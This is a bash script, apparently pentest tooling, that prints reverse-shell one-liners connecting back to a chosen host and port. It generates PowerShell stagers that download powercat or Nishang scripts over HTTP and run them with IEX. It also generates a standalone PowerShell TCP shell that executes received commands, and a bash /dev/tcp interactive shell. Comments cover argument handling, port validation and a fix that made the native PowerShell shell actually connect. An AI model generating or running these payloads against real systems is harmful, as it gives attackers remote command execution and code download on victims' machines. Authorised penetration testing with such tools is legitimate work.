#!/bin/bash
# reverse_shell - print a reverse-shell one-liner that connects back to LHOST:LPORT.
#
#   reverse_shell ps -p LPORT (-l LHOST | -i INTERFACE) [-w WWW_PORT]   # PowerShell stager
#   reverse_shell sh -p LPORT (-l LHOST | -i INTERFACE)                 # bash /dev/tcp shell
#
# The payload is written to stdout without a trailing newline so it can be piped
# straight into a clipboard tool. The PowerShell variants fetch a script over plain
# HTTP from LHOST:WWW_PORT (default 80) and execute it with IEX, so they must only be
# pointed at a web server the operator controls. For authorised testing only.
# -i resolves the interface via an external `ip_addr` helper that is not part of this file.
set -e
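# Write the arguments as one line to stderr.
# Quoted "$*" and printf avoid word-splitting/globbing and keep echo from
# swallowing an argument that looks like an option (e.g. "-n").
err() {
  printf '%s\n' "$*" >&2
}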
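# Write the arguments as one diagnostic line to stderr.
# fd 3 is opened as a copy of stderr for the duration of the group so that
# stdout stays reserved for the generated payload. Quoting "$*" keeps
# arguments intact and printf keeps option-looking text from being eaten.
debug() {
  {
    printf '%s\n' "$*" >&3
  } 3>&2
}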
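# Write the arguments as one line to stdout.
# printf with a fixed format is used instead of `echo $@` so the text is never
# interpreted as echo options or subject to word-splitting/globbing.
out() {
  printf '%s\n' "$*"
}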
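# Print the synopsis and exit with status 1.
# Lists -w (web server port), which getopts already accepts, and terminates the
# last line with a newline; $0 is quoted so a path with spaces still works.
usage() {
  echo "$(basename "$0") [type] -p LPORT [-l LHOST | -i INTERFACE] [-w WWW_PORT]"
  echo "TYPES:"
  printf "\t ps - powershell\n"
  printf "\t sh - shell\n"
  exit 1
}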
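# ---- argument handling ---------------------------------------------------
# The first positional argument is the payload type; the rest are getopts flags.
# Without this guard a bare invocation died silently: `shift` fails on an empty
# argument list and `set -e` exits before usage() is ever reached.
[ $# -ge 1 ] || usage
mode=$1; shift
while getopts "hp:r:i:l:w:" o; do
  case "${o}" in
    p)
      LPORT=${OPTARG}
      ;;
    l)
      LHOST=${OPTARG}
      ;;
    i)
      # `ip_addr` is not defined in this file; presumably an external helper that
      # maps an interface name to an address. Under set -e a missing or failing
      # helper aborts the script here.
      LHOST=$(ip_addr "${OPTARG}")
      ;;
    w)
      WWW_PORT=${OPTARG}
      ;;
    h | *)
      # -r is accepted by the option string but has no handler, so it ends up here.
      usage
      ;;
  esac
done
shift $((OPTIND-1))
if [ -z "${LPORT}" ] || [ -z "${LHOST}" ]; then
  usage
fi
# Port values are spliced verbatim into the generated payload; insist that each
# one given is a real TCP port (base-10 prefix avoids octal surprises like "08").
for port_var in LPORT WWW_PORT; do
  port=${!port_var}
  [ -n "${port}" ] || continue
  if ! [[ "${port}" =~ ^[0-9]+$ ]] || (( 10#${port} < 1 || 10#${port} > 65535 )); then
    err "invalid ${port_var}: ${port}"
    usage
  fi
done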
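# PowerShell stager using powercat.
# Reads LHOST, LPORT and optional WWW_PORT (default 80). The one-liner downloads
# powercat.ps1 from our web server over plain, unauthenticated HTTP and executes
# it with IEX, then connects back to LHOST:LPORT with powershell.exe on the socket
# -- only point it at a server you control. Output has no trailing newline.
ps_powercat() {
  local base_url="http://${LHOST}:${WWW_PORT:-80}"
  printf '%s' "IEX (New-Object System.Net.WebClient).DownloadString('${base_url}/windows/powercat.ps1');powercat -c ${LHOST} -p ${LPORT} -e powershell.exe"
}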
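# PowerShell stager using Nishang's Invoke-PowerShellTcp.
# Reads LHOST, LPORT and optional WWW_PORT (default 80). The script is fetched
# over plain, unauthenticated HTTP and run with IEX before dialling LHOST:LPORT,
# so the web server must be one the operator controls. Output has no trailing newline.
ps_nishang() {
  local base_url="http://${LHOST}:${WWW_PORT:-80}"
  printf '%s' "IEX (New-Object System.Net.WebClient).DownloadString('${base_url}/windows/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress ${LHOST} -Port ${LPORT}"
}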
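# Self-contained PowerShell reverse shell (no download step).
# Reads LHOST and LPORT. Fix: the TCPClient must be assigned to $client -- the
# previous payload created the object and discarded it, so the following
# `$client.GetStream()` call failed on a null value and the shell never connected.
# Output has no trailing newline.
ps_native() {
  printf '%s' "\$client = New-Object System.Net.Sockets.TCPClient(\"${LHOST}\",${LPORT});\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + \"PS \" + (pwd).Path + \"> \";\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()"
}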
# Emit the PowerShell payload. The Nishang stager is the active choice; the
# powercat stager (ps_powercat) is still defined and can be selected here instead.
generate_powershell() {
  local stager=ps_nishang
  "${stager}"
}
# Emit a bash reverse shell using the /dev/tcp pseudo-device: an interactive
# bash with stdout and stderr sent to the socket and stdin read from it.
# Reads LHOST and LPORT; no trailing newline is written.
generate_bash() {
  local endpoint="/dev/tcp/${LHOST}/${LPORT}"
  printf '%s' "/bin/bash -i >& ${endpoint} 0>&1"
}
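# ---- dispatch on the payload type given as the first positional argument ----
case "$mode" in
  ps | powershell)
    generate_powershell
    ;;
  sh | shell)
    generate_bash
    ;;
  *)
    # An unknown type used to exit 0 with no output, which is easy to miss in a
    # pipeline; report it and show the synopsis instead.
    err "unknown type: ${mode}"
    usage
    ;;
esac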